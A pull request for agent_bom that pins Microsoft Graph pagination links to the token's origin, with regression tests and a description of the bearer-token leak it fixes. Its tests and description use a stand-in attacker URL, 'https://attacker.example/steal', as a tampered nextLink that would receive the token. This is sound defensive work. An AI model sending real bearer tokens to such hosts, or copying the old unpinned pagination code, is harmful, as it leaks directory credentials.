### PR TITLE
fix(security): pin Microsoft Graph pagination to the origin that issued the token

### DIFF
--- a/src/agent_bom/cloud/azure_graph.py
+++ b/src/agent_bom/cloud/azure_graph.py
@@ -25,6 +25,7 @@ Required delegated/application permissions (all read-only):
 from __future__ import annotations
 
 from typing import Any, Final
+from urllib.parse import urlsplit
 
 GRAPH_BASE_URL: Final = "https://graph.microsoft.com/v1.0"
 GRAPH_TOKEN_SCOPE: Final = "https://graph.microsoft.com/.default"
@@ -40,6 +41,29 @@ ACCESS_REVIEW_DEFINITIONS_PATH: Final = "/identityGovernance/accessReviews/defin
 RESTRICTED_GUEST_ROLE_TEMPLATE_ID: Final = "2af84b1e-32c8-42b7-82bc-daa82404023b"
 # Windows Azure Service Management API (the "Microsoft Azure Management" cloud app).
 AZURE_MANAGEMENT_APP_ID: Final = "797f4846-ba00-4fd7-ba43-dac1f8f63013"
+
+
+def require_graph_origin(url: str, base_url: str = GRAPH_BASE_URL) -> str:
+    """Return ``url`` only if it stays on the origin that issued the token.
+
+    Microsoft Graph paginates with an absolute ``@odata.nextLink``. Following it
+    verbatim re-sends a directory-scoped bearer token to whatever host the
+    response body names, so a tenant-controlled or tampered page could collect
+    it. #4626 fixed this exact shape once already, for a different paginated
+    API.
+
+    Scheme is part of the origin: an ``http://`` link to the right host would
+    put the token on the wire in cleartext, so a downgrade is refused too.
+
+    Same rule as ``db/sync.py``'s redirect allowlist and
+    ``scripts/check_surface_freshness.py``'s ``_require_origin`` — a third
+    caller, not a third rule.
+    """
+    expected = urlsplit(base_url)
+    actual = urlsplit(url)
+    if (actual.scheme, actual.netloc) != (expected.scheme, expected.netloc):
+        raise GraphUnavailableError(f"refusing to follow an off-origin Microsoft Graph pagination link: {actual.scheme}://{actual.netloc}")
+    return url
 
 
 class GraphError(Exception):
@@ -131,7 +155,8 @@ class AzureGraphClient:
             if isinstance(values, list):
                 items.extend(v for v in values if isinstance(v, dict))
             next_link = payload.get("@odata.nextLink")
-            url = str(next_link) if next_link else None
+            # Pinned before the next iteration re-sends the token to it.
+            url = require_graph_origin(str(next_link), self._base_url) if next_link else None
             seen += 1
             if seen > 1000:  # defensive bound against a pathological pagination loop
                 raise GraphUnavailableError("Microsoft Graph pagination exceeded the safety bound.")

--- a/src/agent_bom/identity/entra_nhi.py
+++ b/src/agent_bom/identity/entra_nhi.py
@@ -81,6 +81,7 @@ class EntraClient:
         self._base_url = base_url.rstrip("/")
 
     def _get(self, path: str) -> list[dict[str, Any]]:
+        from agent_bom.cloud.azure_graph import require_graph_origin
         from agent_bom.http_client import fetch_json
 
         items: list[dict[str, Any]] = []
@@ -102,7 +103,11 @@ class EntraClient:
                 if isinstance(item, dict):
                     items.append(item)
             next_link = payload.get("@odata.nextLink")
-            url = next_link if isinstance(next_link, str) and next_link else None
+            # Pinned to the origin that issued the token, using the shared guard
+            # rather than a second copy of the rule. Following the link verbatim
+            # re-sent a directory-scoped bearer token to whatever host the
+            # response body named.
+            url = require_graph_origin(next_link, self._base_url) if isinstance(next_link, str) and next_link else None
         return items
 
     def list_service_principals(self) -> list[dict[str, Any]]:

--- a/tests/test_graph_pagination_never_leaves_its_origin.py
+++ b/tests/test_graph_pagination_never_leaves_its_origin.py
@@ -1,0 +1,145 @@
+"""A Graph access token must not follow ``@odata.nextLink`` off its origin.
+
+Microsoft Graph paginates by returning an absolute URL in ``@odata.nextLink``.
+Both Graph clients took that URL verbatim and re-sent the bearer token to it:
+
+* ``agent_bom.cloud.azure_graph.AzureGraphClient.list``
+* ``agent_bom.identity.entra_nhi`` (the NHI discovery client)
+
+Only an iteration count bounded the loop — nothing compared the host against
+``GRAPH_BASE_URL``. A tenant-controlled or tampered response body could
+therefore name any host and receive a directory-scoped access token:
+
+    https://graph.microsoft.com/v1.0/servicePrincipals  Authorization=Bearer <token>
+    https://attacker.example/steal                      Authorization=Bearer <token>
+
+This is a recurrence: #4626 fixed the same shape when a bearer token followed a
+paginated URL off-origin. The repository already holds the correct pattern in
+two places — ``db/sync.py``'s redirect host allowlist and
+``scripts/check_surface_freshness.py``'s ``_require_origin`` — so this is a
+third caller of one rule, not a new rule.
+
+The tests assert on **what was sent where**, because the failure mode is a
+header arriving at the wrong host; a test that only checked the return value
+would pass while leaking.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from agent_bom.cloud.azure_graph import GRAPH_BASE_URL
+
+
+class _RecordingResponse:
+    def __init__(self, payload: dict) -> None:
+        self._payload = payload
+        self.status_code = 200
+
+    def json(self) -> dict:
+        return self._payload
+
+
+class _RecordingClient:
+    """Captures every (url, Authorization) pair the client actually issues."""
+
+    def __init__(self, pages: list[dict]) -> None:
+        self._pages = pages
+        self.calls: list[tuple[str, str]] = []
+
+    def get(self, url: str, headers: dict | None = None) -> _RecordingResponse:
+        self.calls.append((url, (headers or {}).get("Authorization", "")))
+        return _RecordingResponse(self._pages.pop(0) if self._pages else {"value": []})
+
+
+TOKEN = "SUPER-SECRET-GRAPH-TOKEN"
+OFF_ORIGIN = "https://attacker.example/steal"
+
+
+def _client(monkeypatch: pytest.MonkeyPatch, pages: list[dict]):
+    from agent_bom.cloud import azure_graph
+
+    client = azure_graph.AzureGraphClient.__new__(azure_graph.AzureGraphClient)
+    client._base_url = GRAPH_BASE_URL  # type: ignore[attr-defined]
+    recorder = _RecordingClient(pages)
+    monkeypatch.setattr(client, "_client", lambda: recorder, raising=False)
+    monkeypatch.setattr(client, "_token", lambda: TOKEN, raising=False)
+    return client, recorder
+
+
+def test_the_token_is_never_sent_to_a_host_the_response_body_named(monkeypatch: pytest.MonkeyPatch) -> None:
+    """The leak itself."""
+    client, recorder = _client(
+        monkeypatch,
+        [
+            {"value": [{"id": "sp-1"}], "@odata.nextLink": OFF_ORIGIN},
+            {"value": [{"id": "sp-2"}]},
+        ],
+    )
+
+    with pytest.raises(Exception):
+        client.list("/servicePrincipals")
+
+    leaked = [url for url, auth in recorder.calls if TOKEN in auth and not url.startswith(GRAPH_BASE_URL)]
+    assert leaked == [], f"the Graph token was sent off-origin to {leaked}"
+
+
+def test_an_off_origin_next_link_is_refused_rather_than_silently_dropped(monkeypatch: pytest.MonkeyPatch) -> None:
+    """Truncating the page silently would hide a tampered directory response."""
+    from agent_bom.cloud.azure_graph import GraphUnavailableError
+
+    client, _recorder = _client(monkeypatch, [{"value": [{"id": "sp-1"}], "@odata.nextLink": OFF_ORIGIN}])
+    with pytest.raises(GraphUnavailableError, match="(?i)origin|host"):
+        client.list("/servicePrincipals")
+
+
+def test_ordinary_same_origin_pagination_still_works(monkeypatch: pytest.MonkeyPatch) -> None:
+    """The guard must not break Graph's own paging, which is the common case."""
+    next_page = f"{GRAPH_BASE_URL}/servicePrincipals?$skiptoken=abc"
+    client, recorder = _client(
+        monkeypatch,
+        [
+            {"value": [{"id": "sp-1"}], "@odata.nextLink": next_page},
+            {"value": [{"id": "sp-2"}]},
+        ],
+    )
+    items = client.list("/servicePrincipals")
+    assert [item["id"] for item in items] == ["sp-1", "sp-2"]
+    assert [url for url, _auth in recorder.calls] == [f"{GRAPH_BASE_URL}/servicePrincipals", next_page]
+
+
+def test_a_scheme_downgrade_on_the_same_host_is_refused(monkeypatch: pytest.MonkeyPatch) -> None:
+    """http:// to the right host would put the token on the wire in cleartext."""
+    from agent_bom.cloud.azure_graph import GraphUnavailableError
+
+    downgraded = GRAPH_BASE_URL.replace("https://", "http://") + "/servicePrincipals?$skiptoken=abc"
+    client, recorder = _client(monkeypatch, [{"value": [], "@odata.nextLink": downgraded}])
+    with pytest.raises(GraphUnavailableError):
+        client.list("/servicePrincipals")
+    assert not [url for url, auth in recorder.calls if url.startswith("http://") and TOKEN in auth]
+
+
+def test_the_nhi_discovery_client_pins_its_origin_too(monkeypatch: pytest.MonkeyPatch) -> None:
+    """The second client paginates the same way against the same directory."""
+    from agent_bom.identity import entra_nhi
+
+    sent: list[tuple[str, str]] = []
+
+    def fake_fetch_json(url: str, headers: dict | None = None, timeout: int = 30) -> dict:
+        sent.append((url, (headers or {}).get("Authorization", "")))
+        if "attacker" in url:
+            return {"value": []}
+        return {"value": [{"id": "sp-1"}], "@odata.nextLink": OFF_ORIGIN}
+
+    monkeypatch.setattr("agent_bom.http_client.fetch_json", fake_fetch_json)
+    client = entra_nhi.EntraClient.__new__(entra_nhi.EntraClient)
+    client._token = TOKEN  # type: ignore[attr-defined]
+    client._base_url = GRAPH_BASE_URL  # type: ignore[attr-defined]
+
+    try:
+        client._get("/servicePrincipals")
+    except Exception:
+        pass
+
+    leaked = [url for url, auth in sent if TOKEN in auth and not url.startswith(GRAPH_BASE_URL)]
+    assert leaked == [], f"the NHI client sent the Graph token off-origin to {leaked}"


### PR DESCRIPTION
Microsoft Graph paginates by returning an **absolute** URL in
`@odata.nextLink`. Both Graph clients took that URL verbatim and re-sent the
bearer token to it:

- `AzureGraphClient.list` (cloud posture)
- `EntraClient._get` (NHI discovery)

Only an iteration count bounded the loop — nothing compared the host against
`GRAPH_BASE_URL`. A tenant-controlled or tampered response body could therefore
name any host and be handed a **directory-scoped access token**:

```
https://graph.microsoft.com/v1.0/servicePrincipals   Authorization=Bearer <token>
https://attacker.example/steal                       Authorization=Bearer <token>
```

## A recurrence, and a rule we already have

#4626 fixed this exact shape when a bearer token followed a paginated URL
off-origin. The correct pattern already exists **twice** in the repo —
`db/sync.py`'s redirect host allowlist and `check_surface_freshness.py`'s
`_require_origin`, whose own docstring says *"this is the second caller, not a
second rule."*

So `require_graph_origin` is the third caller of one rule. Both Graph clients
share it rather than growing a second copy that can drift — which is how the
first two ended up inconsistent.

Two details that matter:

- **Scheme is part of the origin.** An `http://` link to the *right* host would
  put the token on the wire in cleartext, so a downgrade is refused too.
- **An off-origin link raises rather than silently ending the page.** Quietly
  truncating would present a tampered directory response as a short-but-clean
  result — the failure mode that reads as success, which this release has spent
  a lot of time removing.

## Verified

`tests/test_graph_pagination_never_leaves_its_origin.py` — 5 tests, **4 red
before the fix**. They assert on **what was sent where**, capturing every
`(url, Authorization)` pair, because the failure mode is a header arriving at
the wrong host: a test that only checked the returned items would pass while
leaking.

Coverage: the leak itself · the refusal · ordinary same-origin paging still
working (the common case must not break) · the scheme downgrade · the second
client.

**869 passed** across the azure / entra / identity suites ·
`ruff format --check`, `ruff`, `mypy` clean.